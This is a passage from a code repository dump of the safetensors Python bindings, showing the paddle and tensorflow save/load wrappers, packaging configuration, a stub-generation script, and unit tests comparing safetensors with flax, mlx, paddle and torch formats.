155 | result = {}
156 | for k, v in safeview:
157 | dtype = _getdtype(v["dtype"])
158 | arr = np.frombuffer(v["data"], dtype=dtype).reshape(v["shape"])
159 | result[k] = arr
160 | return result
161 |
162 |
163 | def _is_little_endian(tensor: np.ndarray) -> bool:
164 | byteorder = tensor.dtype.byteorder
165 | if byteorder == "=":
166 | if sys.byteorder == "little":
167 | return True
168 | else:
169 | return False
170 | elif byteorder == "|":
171 | return True
172 | elif byteorder == "<":
173 | return True
174 | elif byteorder == ">":
175 | return False
176 | raise ValueError(f"Unexpected byte order {byteorder}")
177 |
--------------------------------------------------------------------------------
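The `_tobytes`/`_is_little_endian` pair above normalizes byte order at save time, so an explicitly big-endian array round-trips to a native little-endian one. A small sketch of that behavior:

```python
import numpy as np

from safetensors.numpy import load, save

big_endian = np.arange(4, dtype=">f4")        # big-endian float32
restored = load(save({"x": big_endian}))["x"]
assert restored.dtype == np.dtype("float32")  # native (little-endian) after load
assert np.array_equal(restored, big_endian)   # values are unchanged
```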
/bindings/python/py_src/safetensors/paddle.py:
--------------------------------------------------------------------------------
1 | import os
2 | from typing import Dict, Optional, Union
3 |
4 | import numpy as np
5 |
6 | import paddle
7 | from safetensors import numpy
8 |
9 |
10 | def save(tensors: Dict[str, paddle.Tensor], metadata: Optional[Dict[str, str]] = None) -> bytes:
11 | """
12 | Saves a dictionary of tensors into raw bytes in safetensors format.
13 |
14 | Args:
15 | tensors (`Dict[str, paddle.Tensor]`):
16 | The incoming tensors. Tensors need to be contiguous and dense.
17 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
18 | Optional text only metadata you might want to save in your header.
19 | For instance it can be useful to specify more about the underlying
20 | tensors. This is purely informative and does not affect tensor loading.
21 |
22 | Returns:
23 | `bytes`: The raw bytes representing the format
24 |
25 | Example:
26 |
27 | ```python
28 | from safetensors.paddle import save
29 | import paddle
30 |
31 | tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))}
32 | byte_data = save(tensors)
33 | ```
34 | """
35 | np_tensors = _paddle2np(tensors)
36 | return numpy.save(np_tensors, metadata=metadata)
37 |
38 |
39 | def save_file(
40 | tensors: Dict[str, paddle.Tensor],
41 | filename: Union[str, os.PathLike],
42 | metadata: Optional[Dict[str, str]] = None,
43 | ) -> None:
44 | """
45 |     Saves a dictionary of tensors into a file in safetensors format.
46 |
47 | Args:
48 | tensors (`Dict[str, paddle.Tensor]`):
49 | The incoming tensors. Tensors need to be contiguous and dense.
50 |         filename (`str`, or `os.PathLike`):
51 | The filename we're saving into.
52 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
53 | Optional text only metadata you might want to save in your header.
54 | For instance it can be useful to specify more about the underlying
55 | tensors. This is purely informative and does not affect tensor loading.
56 |
57 | Returns:
58 | `None`
59 |
60 | Example:
61 |
62 | ```python
63 | from safetensors.paddle import save_file
64 | import paddle
65 |
66 | tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))}
67 | save_file(tensors, "model.safetensors")
68 | ```
69 | """
70 | np_tensors = _paddle2np(tensors)
71 | return numpy.save_file(np_tensors, filename, metadata=metadata)
72 |
73 |
74 | def load(data: bytes, device: str = "cpu") -> Dict[str, paddle.Tensor]:
75 | """
76 | Loads a safetensors file into paddle format from pure bytes.
77 |
78 | Args:
79 | data (`bytes`):
80 | The content of a safetensors file
81 |
82 | Returns:
83 | `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor` on cpu
84 |
85 | Example:
86 |
87 | ```python
88 | from safetensors.paddle import load
89 |
90 | file_path = "./my_folder/bert.safetensors"
91 | with open(file_path, "rb") as f:
92 | data = f.read()
93 |
94 | loaded = load(data)
95 | ```
96 | """
97 | flat = numpy.load(data)
98 | return _np2paddle(flat, device)
99 |
100 |
101 | def load_file(filename: Union[str, os.PathLike], device="cpu") -> Dict[str, paddle.Tensor]:
102 | """
103 | Loads a safetensors file into paddle format.
104 |
105 | Args:
106 |         filename (`str`, or `os.PathLike`):
107 | The name of the file which contains the tensors
108 |         device (`str`, *optional*, defaults to `"cpu"`):
109 | The device where the tensors need to be located after load.
110 | available options are all regular paddle device locations
111 |
112 | Returns:
113 | `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor`
114 |
115 | Example:
116 |
117 | ```python
118 | from safetensors.paddle import load_file
119 |
120 | file_path = "./my_folder/bert.safetensors"
121 | loaded = load_file(file_path)
122 | ```
123 | """
124 | flat = numpy.load_file(filename)
125 | output = _np2paddle(flat, device)
126 | return output
127 |
128 |
129 | def _np2paddle(numpy_dict: Dict[str, np.ndarray], device: str = "cpu") -> Dict[str, paddle.Tensor]:
130 | for k, v in numpy_dict.items():
131 | numpy_dict[k] = paddle.to_tensor(v, place=device)
132 | return numpy_dict
133 |
134 |
135 | def _paddle2np(paddle_dict: Dict[str, paddle.Tensor]) -> Dict[str, np.ndarray]:
136 | for k, v in paddle_dict.items():
137 | paddle_dict[k] = v.detach().cpu().numpy()
138 | return paddle_dict
139 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/py.typed:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/huggingface/safetensors/bca53e3e178b9e1279c8d32302cdbbdcd4ce4842/bindings/python/py_src/safetensors/py.typed
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/tensorflow.py:
--------------------------------------------------------------------------------
1 | import os
2 | from typing import Dict, Optional, Union
3 |
4 | import numpy as np
5 | import tensorflow as tf
6 |
7 | from safetensors import numpy, safe_open
8 |
9 |
10 | def save(tensors: Dict[str, tf.Tensor], metadata: Optional[Dict[str, str]] = None) -> bytes:
11 | """
12 | Saves a dictionary of tensors into raw bytes in safetensors format.
13 |
14 | Args:
15 | tensors (`Dict[str, tf.Tensor]`):
16 | The incoming tensors. Tensors need to be contiguous and dense.
17 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
18 | Optional text only metadata you might want to save in your header.
19 | For instance it can be useful to specify more about the underlying
20 | tensors. This is purely informative and does not affect tensor loading.
21 |
22 | Returns:
23 | `bytes`: The raw bytes representing the format
24 |
25 | Example:
26 |
27 | ```python
28 | from safetensors.tensorflow import save
29 | import tensorflow as tf
30 |
31 | tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))}
32 | byte_data = save(tensors)
33 | ```
34 | """
35 | np_tensors = _tf2np(tensors)
36 | return numpy.save(np_tensors, metadata=metadata)
37 |
38 |
39 | def save_file(
40 | tensors: Dict[str, tf.Tensor],
41 | filename: Union[str, os.PathLike],
42 | metadata: Optional[Dict[str, str]] = None,
43 | ) -> None:
44 | """
45 |     Saves a dictionary of tensors into a file in safetensors format.
46 |
47 | Args:
48 | tensors (`Dict[str, tf.Tensor]`):
49 | The incoming tensors. Tensors need to be contiguous and dense.
50 |         filename (`str`, or `os.PathLike`):
51 | The filename we're saving into.
52 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
53 | Optional text only metadata you might want to save in your header.
54 | For instance it can be useful to specify more about the underlying
55 | tensors. This is purely informative and does not affect tensor loading.
56 |
57 | Returns:
58 | `None`
59 |
60 | Example:
61 |
62 | ```python
63 | from safetensors.tensorflow import save_file
64 | import tensorflow as tf
65 |
66 | tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))}
67 | save_file(tensors, "model.safetensors")
68 | ```
69 | """
70 | np_tensors = _tf2np(tensors)
71 | return numpy.save_file(np_tensors, filename, metadata=metadata)
72 |
73 |
74 | def load(data: bytes) -> Dict[str, tf.Tensor]:
75 | """
76 | Loads a safetensors file into tensorflow format from pure bytes.
77 |
78 | Args:
79 | data (`bytes`):
80 | The content of a safetensors file
81 |
82 | Returns:
83 | `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor` on cpu
84 |
85 | Example:
86 |
87 | ```python
88 | from safetensors.tensorflow import load
89 |
90 | file_path = "./my_folder/bert.safetensors"
91 | with open(file_path, "rb") as f:
92 | data = f.read()
93 |
94 | loaded = load(data)
95 | ```
96 | """
97 | flat = numpy.load(data)
98 | return _np2tf(flat)
99 |
100 |
101 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, tf.Tensor]:
102 | """
103 | Loads a safetensors file into tensorflow format.
104 |
105 | Args:
106 |         filename (`str`, or `os.PathLike`):
107 | The name of the file which contains the tensors
108 |
109 | Returns:
110 | `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor`
111 |
112 | Example:
113 |
114 | ```python
115 | from safetensors.tensorflow import load_file
116 |
117 | file_path = "./my_folder/bert.safetensors"
118 | loaded = load_file(file_path)
119 | ```
120 | """
121 | result = {}
122 | with safe_open(filename, framework="tf") as f:
123 | for k in f.offset_keys():
124 | result[k] = f.get_tensor(k)
125 | return result
126 |
127 |
128 | def _np2tf(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, tf.Tensor]:
129 | for k, v in numpy_dict.items():
130 | numpy_dict[k] = tf.convert_to_tensor(v)
131 | return numpy_dict
132 |
133 |
134 | def _tf2np(tf_dict: Dict[str, tf.Tensor]) -> Dict[str, np.ndarray]:
135 | for k, v in tf_dict.items():
136 | tf_dict[k] = v.numpy()
137 | return tf_dict
138 |
--------------------------------------------------------------------------------
/bindings/python/pyproject.toml:
--------------------------------------------------------------------------------
1 | [project]
2 | name = 'safetensors'
3 | requires-python = '>=3.9'
4 | authors = [
5 | {name = 'Nicolas Patry', email = 'patry.nicolas@protonmail.com'}
6 | ]
7 | classifiers = [
8 | "Development Status :: 5 - Production/Stable",
9 | "Intended Audience :: Developers",
10 | "Intended Audience :: Education",
11 | "Intended Audience :: Science/Research",
12 | "License :: OSI Approved :: Apache Software License",
13 | "Operating System :: OS Independent",
14 | "Programming Language :: Python :: 3",
15 | "Programming Language :: Python :: 3.7",
16 | "Programming Language :: Python :: 3.8",
17 | "Programming Language :: Python :: 3.9",
18 | "Programming Language :: Python :: 3.10",
19 | "Topic :: Scientific/Engineering :: Artificial Intelligence",
20 | "Typing :: Typed",
21 | ]
22 | license = { file = "LICENSE" }
23 | dynamic = [
24 | 'description',
25 | 'readme',
26 | 'version',
27 | ]
28 |
29 | [project.urls]
30 | Homepage = 'https://github.com/huggingface/safetensors'
31 | Source = 'https://github.com/huggingface/safetensors'
32 |
33 | [project.optional-dependencies]
34 | numpy = ["numpy>=1.21.6"]
35 | torch = [
36 | "safetensors[numpy]",
37 | "torch>=1.10",
38 | ]
39 | tensorflow = [
40 | "safetensors[numpy]",
41 | "tensorflow>=2.11.0",
42 | ]
43 | # pinning tf version 2.18.0 for doc-builder
44 | pinned-tf = [
45 | "safetensors[numpy]",
46 | "tensorflow==2.18.0",
47 | ]
48 | jax = [
49 | "safetensors[numpy]",
50 | "flax>=0.6.3",
51 | "jax>=0.3.25",
52 | "jaxlib>=0.3.25",
53 | ]
54 | mlx = [
55 | "mlx>=0.0.9",
56 | ]
57 | paddlepaddle = [
58 | "safetensors[numpy]",
59 | "paddlepaddle>=2.4.1",
60 | ]
61 | quality = [
62 | "black==22.3", # after updating to black 2023, also update Python version in pyproject.toml to 3.7
63 | "click==8.0.4",
64 | "isort>=5.5.4",
65 | "flake8>=3.8.3",
66 | ]
67 | testing = [
68 | "safetensors[numpy]",
69 | "h5py>=3.7.0",
70 | "huggingface_hub>=0.12.1",
71 | "setuptools_rust>=1.5.2",
72 | "pytest>=7.2.0",
73 | "pytest-benchmark>=4.0.0",
74 | # "python-afl>=0.7.3",
75 | "hypothesis>=6.70.2",
76 | ]
77 | all = [
78 | "safetensors[torch]",
79 | "safetensors[numpy]",
80 | "safetensors[pinned-tf]",
81 | "safetensors[jax]",
82 | "safetensors[paddlepaddle]",
83 | "safetensors[quality]",
84 | "safetensors[testing]",
85 | ]
86 | dev = [
87 | "safetensors[all]",
88 | ]
89 |
90 |
91 | [build-system]
92 | requires = ["maturin>=1.0,<2.0"]
93 | build-backend = "maturin"
94 |
95 | [tool.maturin]
96 | python-source = "py_src"
97 | module-name = "safetensors._safetensors_rust"
98 | bindings = 'pyo3'
99 | features = ["pyo3/extension-module"]
100 |
101 | [tool.black]
102 | line-length = 119
103 | target-version = ['py35']
104 |
105 | [tool.setuptools.dynamic]
106 | readme = {file = ["README.rst"]}
107 |
--------------------------------------------------------------------------------
/bindings/python/setup.cfg:
--------------------------------------------------------------------------------
1 | [isort]
2 | default_section = FIRSTPARTY
3 | ensure_newline_before_comments = True
4 | force_grid_wrap = 0
5 | include_trailing_comma = True
6 | known_first_party = safetensors
7 | known_third_party =
8 | absl
9 | conllu
10 | datasets
11 | elasticsearch
12 | fairseq
13 | faiss-cpu
14 | fastprogress
15 | fire
16 | fugashi
17 | git
18 | h5py
19 | matplotlib
20 | nltk
21 | numpy
22 | packaging
23 | pandas
24 | PIL
25 | psutil
26 | pytest
27 | pytorch_lightning
28 | rouge_score
29 | sacrebleu
30 | seqeval
31 | sklearn
32 | streamlit
33 | tensorboardX
34 | tensorflow
35 | tensorflow_datasets
36 | timeout_decorator
37 | torch
38 | torchaudio
39 | torchtext
40 | torchvision
41 | torch_xla
42 | tqdm
43 | paddlepaddle
44 |
45 | line_length = 119
46 | lines_after_imports = 2
47 | multi_line_output = 3
48 | use_parentheses = True
49 |
50 | [flake8]
51 | ignore = E203, E501, E741, W503, W605
52 | max-line-length = 119
53 |
54 | [tool:pytest]
55 | doctest_optionflags=NUMBER NORMALIZE_WHITESPACE ELLIPSIS
--------------------------------------------------------------------------------
/bindings/python/stub.py:
--------------------------------------------------------------------------------
1 | import argparse
2 | import inspect
3 | import os
4 |
5 | import black
6 |
7 |
8 | INDENT = " " * 4
9 | GENERATED_COMMENT = "# Generated content DO NOT EDIT\n"
10 |
11 |
12 | def do_indent(text: str, indent: str):
13 | return text.replace("\n", f"\n{indent}")
14 |
15 |
16 | def function(obj, indent, text_signature=None):
17 | if text_signature is None:
18 | text_signature = obj.__text_signature__
19 | string = ""
20 | string += f"{indent}def {obj.__name__}{text_signature}:\n"
21 | indent += INDENT
22 | string += f'{indent}"""\n'
23 | string += f"{indent}{do_indent(obj.__doc__, indent)}\n"
24 | string += f'{indent}"""\n'
25 | string += f"{indent}pass\n"
26 | string += "\n"
27 | string += "\n"
28 | return string
29 |
30 |
31 | def member_sort(member):
32 | if inspect.isclass(member):
33 | value = 10 + len(inspect.getmro(member))
34 | else:
35 | value = 1
36 | return value
37 |
38 |
39 | def fn_predicate(obj):
40 | value = inspect.ismethoddescriptor(obj) or inspect.isbuiltin(obj)
41 | if value:
42 | return (
43 | obj.__doc__
44 | and obj.__text_signature__
45 | and (not obj.__name__.startswith("_") or obj.__name__ in {"__enter__", "__exit__"})
46 | )
47 | if inspect.isgetsetdescriptor(obj):
48 | return obj.__doc__ and not obj.__name__.startswith("_")
49 | return False
50 |
51 |
52 | def get_module_members(module):
53 | members = [
54 | member
55 | for name, member in inspect.getmembers(module)
56 | if not name.startswith("_") and not inspect.ismodule(member)
57 | ]
58 | members.sort(key=member_sort)
59 | return members
60 |
61 |
62 | def pyi_file(obj, indent=""):
63 | string = ""
64 | if inspect.ismodule(obj):
65 | string += GENERATED_COMMENT
66 | members = get_module_members(obj)
67 | for member in members:
68 | string += pyi_file(member, indent)
69 |
70 | elif inspect.isclass(obj):
71 | indent += INDENT
72 | mro = inspect.getmro(obj)
73 | if len(mro) > 2:
74 | inherit = f"({mro[1].__name__})"
75 | else:
76 | inherit = ""
77 | string += f"class {obj.__name__}{inherit}:\n"
78 |
79 | body = ""
80 | if obj.__doc__:
81 | body += f'{indent}"""\n{indent}{do_indent(obj.__doc__, indent)}\n{indent}"""\n'
82 |
83 | fns = inspect.getmembers(obj, fn_predicate)
84 |
85 | # Init
86 | if obj.__text_signature__:
87 | signature = obj.__text_signature__.replace("(", "(self, ")
88 | body += f"{indent}def __init__{signature}:\n"
89 | body += f"{indent+INDENT}pass\n"
90 | body += "\n"
91 |
92 | for name, fn in fns:
93 | body += pyi_file(fn, indent=indent)
94 |
95 | if not body:
96 | body += f"{indent}pass\n"
97 |
98 | string += body
99 | string += "\n\n"
100 |
101 | elif inspect.isbuiltin(obj):
102 | string += f"{indent}@staticmethod\n"
103 | string += function(obj, indent)
104 |
105 | elif inspect.ismethoddescriptor(obj):
106 | string += function(obj, indent)
107 |
108 | elif inspect.isgetsetdescriptor(obj):
109 |         # TODO it would be interesting to add the setter maybe?
110 | string += f"{indent}@property\n"
111 | string += function(obj, indent, text_signature="(self)")
112 | else:
113 | raise Exception(f"Object {obj} is not supported")
114 | return string
115 |
116 |
117 | def py_file(module, origin):
118 | members = get_module_members(module)
119 |
120 | string = GENERATED_COMMENT
121 | string += f"from .. import {origin}\n"
122 | string += "\n"
123 | for member in members:
124 | name = member.__name__
125 | string += f"{name} = {origin}.{name}\n"
126 | return string
127 |
128 |
129 | def do_black(content, is_pyi):
130 | mode = black.Mode(
131 | target_versions={black.TargetVersion.PY35},
132 | line_length=119,
133 | is_pyi=is_pyi,
134 | string_normalization=True,
135 | experimental_string_processing=False,
136 | )
137 | try:
138 | content = content.replace("$self", "self")
139 | return black.format_file_contents(content, fast=True, mode=mode)
140 | except black.NothingChanged:
141 | return content
142 |
143 |
144 | def write(module, directory, origin, check=False):
145 | submodules = [(name, member) for name, member in inspect.getmembers(module) if inspect.ismodule(member)]
146 |
147 | filename = os.path.join(directory, "__init__.pyi")
148 | pyi_content = pyi_file(module)
149 | pyi_content = do_black(pyi_content, is_pyi=True)
150 | os.makedirs(directory, exist_ok=True)
151 | if check:
152 | with open(filename, "r") as f:
153 | data = f.read()
154 | assert data == pyi_content, f"The content of {filename} seems outdated, please run `python stub.py`"
155 | else:
156 | with open(filename, "w") as f:
157 | f.write(pyi_content)
158 |
159 | filename = os.path.join(directory, "__init__.py")
160 | py_content = py_file(module, origin)
161 | py_content = do_black(py_content, is_pyi=False)
162 | os.makedirs(directory, exist_ok=True)
163 |
164 | is_auto = False
165 | if not os.path.exists(filename):
166 | is_auto = True
167 | else:
168 | with open(filename, "r") as f:
169 | line = f.readline()
170 | if line == GENERATED_COMMENT:
171 | is_auto = True
172 |
173 | if is_auto:
174 | if check:
175 | with open(filename, "r") as f:
176 | data = f.read()
177 | assert data == py_content, f"The content of {filename} seems outdated, please run `python stub.py`"
178 | else:
179 | with open(filename, "w") as f:
180 | f.write(py_content)
181 |
182 | for name, submodule in submodules:
183 | write(submodule, os.path.join(directory, name), f"{name}", check=check)
184 |
185 |
186 | if __name__ == "__main__":
187 | parser = argparse.ArgumentParser()
188 | parser.add_argument("--check", action="store_true")
189 |
190 | args = parser.parse_args()
191 | import safetensors
192 |
193 | write(
194 | safetensors._safetensors_rust,
195 | "py_src/safetensors/",
196 | "safetensors",
197 | check=args.check,
198 | )
199 |
--------------------------------------------------------------------------------
/bindings/python/tests/data/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/huggingface/safetensors/bca53e3e178b9e1279c8d32302cdbbdcd4ce4842/bindings/python/tests/data/__init__.py
--------------------------------------------------------------------------------
/bindings/python/tests/test_flax_comparison.py:
--------------------------------------------------------------------------------
1 | import platform
2 | import unittest
3 | import sys
4 |
5 |
6 | if platform.system() != "Windows":
7 |     # Jax is not supported on Windows; don't crash on import there.
8 |     # These tests will be skipped anyway.
9 | import jax.numpy as jnp
10 | from jax import random
11 | from flax.serialization import msgpack_restore, msgpack_serialize
12 | from safetensors import safe_open
13 | from safetensors.flax import load_file, save_file
14 |
15 |
16 | # Jax doesn't exist on Windows
17 | @unittest.skipIf(platform.system() == "Windows", "Flax is not available on Windows")
18 | class LoadTestCase(unittest.TestCase):
19 | def setUp(self):
20 | key = random.key(0)
21 | data = {
22 | "test": random.normal(key, (1024, 1024), dtype=jnp.float32),
23 | "test2": random.normal(key, (1024, 1024), dtype=jnp.float16),
24 | "test3": random.normal(key, (1024, 1024), dtype=jnp.bfloat16),
25 | }
26 | self.flax_filename = "./tests/data/flax_load.msgpack"
27 | self.sf_filename = "./tests/data/flax_load.safetensors"
28 |
29 | serialized = msgpack_serialize(data)
30 | with open(self.flax_filename, "wb") as f:
31 | f.write(serialized)
32 |
33 | save_file(data, self.sf_filename)
34 |
35 | def test_zero_sized(self):
36 | data = {
37 | "test": jnp.zeros((2, 0), dtype=jnp.float32),
38 | }
39 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors"
40 | save_file(data.copy(), local)
41 | reloaded = load_file(local)
42 | # Empty tensor != empty tensor on numpy, so comparing shapes
43 | # instead
44 | self.assertEqual(data["test"].shape, reloaded["test"].shape)
45 |
46 | def test_deserialization_safe(self):
47 | weights = load_file(self.sf_filename)
48 |
49 | with open(self.flax_filename, "rb") as f:
50 | data = f.read()
51 | flax_weights = msgpack_restore(data)
52 |
53 | for k, v in weights.items():
54 | tv = flax_weights[k]
55 | self.assertTrue(jnp.allclose(v, tv))
56 |
57 | def test_deserialization_safe_open(self):
58 | weights = {}
59 | with safe_open(self.sf_filename, framework="flax") as f:
60 | for k in f.keys():
61 | weights[k] = f.get_tensor(k)
62 |
63 | with open(self.flax_filename, "rb") as f:
64 | data = f.read()
65 | flax_weights = msgpack_restore(data)
66 |
67 | for k, v in weights.items():
68 | tv = flax_weights[k]
69 | self.assertTrue(jnp.allclose(v, tv))
70 |
71 | def test_loading_without_ml_dtype(self):
72 | # This does not work as we cannot unload
73 | # modules, copy this into its own file to test.
74 | # https://github.com/huggingface/safetensors/issues/598
75 | sys.modules.pop("ml_dtypes", None)
76 | with safe_open(self.sf_filename, framework="flax") as f:
77 | f.get_tensor("test3")
78 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_mlx_comparison.py:
--------------------------------------------------------------------------------
1 | import platform
2 | import unittest
3 |
4 |
5 | HAS_MLX = False
6 | if platform.system() == "Darwin":
7 |     # MLX is only available on macOS; don't crash on import elsewhere.
8 |     # These tests will be skipped anyway.
9 | try:
10 | import mlx.core as mx
11 |
12 | HAS_MLX = True
13 | except ImportError:
14 | pass
15 | if HAS_MLX:
16 | from safetensors import safe_open
17 | from safetensors.mlx import load_file, save_file
18 |
19 |
20 | # MLX only exists on macOS
21 | @unittest.skipIf(platform.system() != "Darwin", "MLX is not available on non-Mac platforms")
22 | @unittest.skipIf(not HAS_MLX, "MLX is not available.")
23 | class LoadTestCase(unittest.TestCase):
24 | def setUp(self):
25 | data = {
26 | "test": mx.randn((1024, 1024), dtype=mx.float32),
27 | "test2": mx.randn((1024, 1024), dtype=mx.float32),
28 | "test3": mx.randn((1024, 1024), dtype=mx.float32),
29 | # This doesn't work because bfloat16 is not implemented
30 | # with similar workarounds as jax/tensorflow.
31 | # https://github.com/ml-explore/mlx/issues/1296
32 | # "test4": mx.randn((1024, 1024), dtype=mx.bfloat16),
33 | }
34 | self.mlx_filename = "./tests/data/mlx_load.npz"
35 | self.sf_filename = "./tests/data/mlx_load.safetensors"
36 |
37 | mx.savez(self.mlx_filename, **data)
38 | save_file(data, self.sf_filename)
39 |
40 | def test_zero_sized(self):
41 | data = {
42 | "test": mx.zeros((2, 0), dtype=mx.float32),
43 | }
44 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors"
45 | save_file(data.copy(), local)
46 | reloaded = load_file(local)
47 | # Empty tensor != empty tensor on numpy, so comparing shapes
48 | # instead
49 | self.assertEqual(data["test"].shape, reloaded["test"].shape)
50 |
51 | def test_deserialization_safe(self):
52 | weights = load_file(self.sf_filename)
53 |
54 | mlx_weights = mx.load(self.mlx_filename)
55 |
56 | for k, v in weights.items():
57 | tv = mlx_weights[k]
58 | self.assertTrue(mx.allclose(v, tv))
59 |
60 | def test_deserialization_safe_open(self):
61 | weights = {}
62 | with safe_open(self.sf_filename, framework="mlx") as f:
63 | for k in f.keys():
64 | weights[k] = f.get_tensor(k)
65 |
66 | mlx_weights = mx.load(self.mlx_filename)
67 |
68 | for k, v in weights.items():
69 | tv = mlx_weights[k]
70 | self.assertTrue(mx.allclose(v, tv))
71 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_paddle_comparison.py:
--------------------------------------------------------------------------------
1 | import unittest
2 |
3 | import numpy as np
4 |
5 |
6 | try:
7 | import paddle
8 | from safetensors.paddle import load_file, save_file
9 |
10 | HAS_PADDLE = True
11 | except ImportError:
12 | HAS_PADDLE = False
13 |
14 |
15 | @unittest.skipIf(not HAS_PADDLE, "Paddle is not available")
16 | class SafeTestCase(unittest.TestCase):
17 | def setUp(self):
18 | data = {
19 | "test": paddle.zeros((1024, 1024), dtype=paddle.float32),
20 | "test2": paddle.zeros((1024, 1024), dtype=paddle.float32),
21 | "test3": paddle.zeros((1024, 1024), dtype=paddle.float32),
22 | }
23 | self.paddle_filename = "./tests/data/paddle_load.pdparams"
24 | self.sf_filename = "./tests/data/paddle_load.safetensors"
25 |
26 | paddle.save(data, self.paddle_filename)
27 | save_file(data, self.sf_filename)
28 |
29 | @unittest.expectedFailure
30 | def test_zero_sized(self):
31 | # This fails because paddle wants initialized tensor before
32 | # sending to numpy
33 | data = {
34 | "test": paddle.zeros((2, 0), dtype=paddle.float32),
35 | }
36 | local = "./tests/data/out_safe_paddle_mmap_small2.safetensors"
37 | save_file(data, local)
38 | reloaded = load_file(local)
39 | self.assertTrue(paddle.equal(data["test"], reloaded["test"]))
40 |
41 | def test_deserialization_safe(self):
42 | weights = load_file(self.sf_filename)
43 |
44 | paddle_weights = paddle.load(self.paddle_filename)
45 | for k, v in weights.items():
46 | tv = paddle_weights[k]
47 | self.assertTrue(np.allclose(v, tv))
48 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_pt_model.py:
--------------------------------------------------------------------------------
1 | import copy
2 | import unittest
3 |
4 | import torch
5 |
6 | from safetensors import safe_open
7 | from safetensors.torch import (
8 | _end_ptr,
9 | _find_shared_tensors,
10 | _is_complete,
11 | _remove_duplicate_names,
12 | load_model,
13 | save_file,
14 | save_model,
15 | )
16 |
17 |
18 | class OnesModel(torch.nn.Module):
19 | def __init__(self):
20 | super().__init__()
21 | self.a = torch.nn.Linear(4, 4)
22 | self.a.weight = torch.nn.Parameter(torch.ones((4, 4)))
23 | self.a.bias = torch.nn.Parameter(torch.ones((4,)))
24 | self.b = self.a
25 |
26 |
27 | class Model(torch.nn.Module):
28 | def __init__(self):
29 | super().__init__()
30 | self.a = torch.nn.Linear(100, 100)
31 | self.b = self.a
32 |
33 |
34 | class NonContiguousModel(torch.nn.Module):
35 | def __init__(self):
36 | super().__init__()
37 | self.a = torch.nn.Linear(100, 100)
38 | A = torch.zeros((100, 100))
39 | A = A.transpose(0, 1)
40 | self.a.weight = torch.nn.Parameter(A)
41 |
42 |
43 | class CopyModel(torch.nn.Module):
44 | def __init__(self):
45 | super().__init__()
46 | self.a = torch.nn.Linear(100, 100)
47 | self.b = copy.deepcopy(self.a)
48 |
49 |
50 | class NoSharedModel(torch.nn.Module):
51 | def __init__(self):
52 | super().__init__()
53 | self.a = torch.nn.Linear(100, 100)
54 | self.b = torch.nn.Linear(100, 100)
55 |
56 |
57 | class TorchModelTestCase(unittest.TestCase):
58 | def test_is_complete(self):
59 | A = torch.zeros((3, 3))
60 | self.assertTrue(_is_complete(A))
61 |
62 | B = A[:1, :]
63 | self.assertFalse(_is_complete(B))
64 |
65 | # Covers the whole storage but with holes
66 | C = A[::2, :]
67 | self.assertFalse(_is_complete(C))
68 |
69 | D = torch.zeros((2, 2), device=torch.device("meta"))
70 | self.assertTrue(_is_complete(D))
71 |
72 | def test_find_shared_tensors(self):
73 | A = torch.zeros((3, 3))
74 | B = A[:1, :]
75 |
76 | self.assertEqual(_find_shared_tensors({"A": A, "B": B}), [{"A", "B"}])
77 | self.assertEqual(_find_shared_tensors({"A": A}), [{"A"}])
78 | self.assertEqual(_find_shared_tensors({"B": B}), [{"B"}])
79 |
80 | C = torch.zeros((2, 2), device=torch.device("meta"))
81 | D = C[:1]
82 | # Meta device is not shared
83 | self.assertEqual(_find_shared_tensors({"C": C, "D": D}), [])
84 | self.assertEqual(_find_shared_tensors({"C": C}), [])
85 | self.assertEqual(_find_shared_tensors({"D": D}), [])
86 |
87 | def test_find_shared_non_shared_tensors(self):
88 | A = torch.zeros((4,))
89 | B = A[:2]
90 | C = A[2:]
91 | # Shared storage but do not overlap
92 | self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B"}, {"C"}])
93 |
94 | B = A[:2]
95 | C = A[1:]
96 | # Shared storage but *do* overlap
97 | self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B", "C"}])
98 |
99 | B = A[:2]
100 | C = A[2:]
101 | D = A[:1]
102 | # Shared storage but *do* overlap
103 | self.assertEqual(_find_shared_tensors({"B": B, "C": C, "D": D}), [{"B", "D"}, {"C"}])
104 |
105 | def test_end_ptr(self):
106 | A = torch.zeros((4,))
107 | start = A.data_ptr()
108 | end = _end_ptr(A)
109 | self.assertEqual(end - start, 16)
110 | B = torch.zeros((16,))
111 | A = B[::4]
112 | start = A.data_ptr()
113 | end = _end_ptr(A)
114 |         # Jump 3 times 16 bytes (the stride of B)
115 |         # Then add the size of one datapoint, 4 bytes
116 | self.assertEqual(end - start, 16 * 3 + 4)
117 |
118 | # FLOAT16
119 | A = torch.zeros((4,), dtype=torch.float16)
120 | start = A.data_ptr()
121 | end = _end_ptr(A)
122 | self.assertEqual(end - start, 8)
123 | B = torch.zeros((16,), dtype=torch.float16)
124 | A = B[::4]
125 | start = A.data_ptr()
126 | end = _end_ptr(A)
127 | # Jump 3 times 8 bytes (the stride of B)
128 |         # Then add the size of one datapoint, 2 bytes
129 | self.assertEqual(end - start, 8 * 3 + 2)
130 |
131 | def test_remove_duplicate_names(self):
132 | A = torch.zeros((3, 3))
133 | B = A[:1, :]
134 |
